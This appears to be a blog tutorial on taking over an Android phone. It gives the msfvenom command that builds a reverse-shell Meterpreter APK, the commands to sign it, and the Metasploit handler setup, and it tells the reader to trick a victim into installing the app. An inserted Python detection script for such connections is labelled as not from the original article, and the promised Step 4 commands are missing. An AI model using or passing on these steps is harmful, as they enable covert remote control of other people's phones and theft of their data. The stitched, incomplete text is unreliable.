When it comes to hacking Android phones, there are tonnes of ways to do so. There are apps, web portals, scripts, and whatnot. We are going to guide you on how to hack an Android phone using Metasploit and MSFVenom.
PS: I have already written one article on hacking an Android phone with SpyNote; do read it.
So today we are going to learn about MSFVenom and how to hack an Android phone using Metasploit and MSFVenom. MSFVenom is a hacking tool used to hack Android devices by making malicious APKs. MSFVenom combines MSFPayload and MSFEncode: MSFEncode is the encoder, and MSFPayload is the command-line interface used to generate and output all the types of shellcode available in Metasploit.
To perform this hack you'll need Kali Linux installed on your computer and an Android phone as a target.
Below are the steps to perform this hack.
Step 1: Creating the APK file
Open Kali Linux. Open your terminal and type in the following command:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hackingworld.apk
**LHOST = your IP address
**Use ifconfig to find your IP address if you don't know it.
Step 2: Delivering the APK file to the victim
You have now created your malicious spyware .apk file. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target. Use social engineering to do this so that the victim actually installs the APK.
**If you get any signing errors or issues use the following:
Keytool (Comes Pre-Installed in Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsigner (Comes Pre-Installed in Kali Linux)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname
jarsigner -verify -verbose -certs hackingworld.apk
Step 3: Metasploit setup
Open up a new terminal and use the following command to start Metasploit framework.
Now in the Metasploit framework console type the following:
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.78.129
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
**LHOST = your IP address
Now when the user opens the app on their phone, you will get a session with that device. And whoa! The device is yours to operate.
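Seen from the network side, the session described above is an outbound TCP connection from the phone to the LHOST and LPORT set in the handler; the following added detection example (not code from the original article) flags that pattern in flow logs. The log format, subnet layout, server allow-list and sample lines are assumptions constructed for illustration.

```python
import ipaddress

# Assumptions (constructed for this example, not from the article):
# the log format, the client subnet and the server allow-list.
CLIENT_NET = ipaddress.ip_network("192.168.78.0/24")  # Wi-Fi clients, incl. phones
SERVERS = {ipaddress.ip_address("192.168.78.1"),      # gateway / DNS
           ipaddress.ip_address("192.168.78.10")}     # internal file server
DEFAULT_HANDLER_PORT = 4444                            # LPORT used in the article

# Constructed sample: timestamp src_ip src_port dst_ip dst_port proto
SAMPLE_LOG = """\
2024-05-01T10:00:01 192.168.78.55 49152 192.168.78.1 53 udp
2024-05-01T10:00:02 192.168.78.55 49160 93.184.216.34 443 tcp
2024-05-01T10:00:05 192.168.78.55 49171 192.168.78.129 4444 tcp
2024-05-01T10:00:09 192.168.78.60 50222 192.168.78.10 445 tcp
2024-05-01T10:00:12 192.168.78.61 50300 192.168.78.129 8443 tcp
malformed line
"""

def find_suspect_flows(log_text):
    """Return (severity, line) for client-to-client TCP flows on the LAN."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue  # skip malformed records instead of crashing
        _, src, _, dst, dport, proto = parts
        try:
            src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
            port = int(dport)
        except ValueError:
            continue
        if proto != "tcp" or src_ip not in CLIENT_NET:
            continue
        # A reverse_tcp payload dials out from the phone to the listener.
        # LPORT is configurable, so the rule keys on a client talking to a
        # non-server peer; the default port only raises the severity.
        if dst_ip in CLIENT_NET and dst_ip not in SERVERS:
            severity = "high" if port == DEFAULT_HANDLER_PORT else "medium"
            hits.append((severity, line))
    return hits

if __name__ == "__main__":
    for severity, line in find_suspect_flows(SAMPLE_LOG):
        print(severity, line)
```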
Step 4: Exploit..!!!
Some commands you should definitely try:
So, this was all about hacking an Android Phone using MSFVenom. For feedback, questions or issues, feel free to write them in the comments section.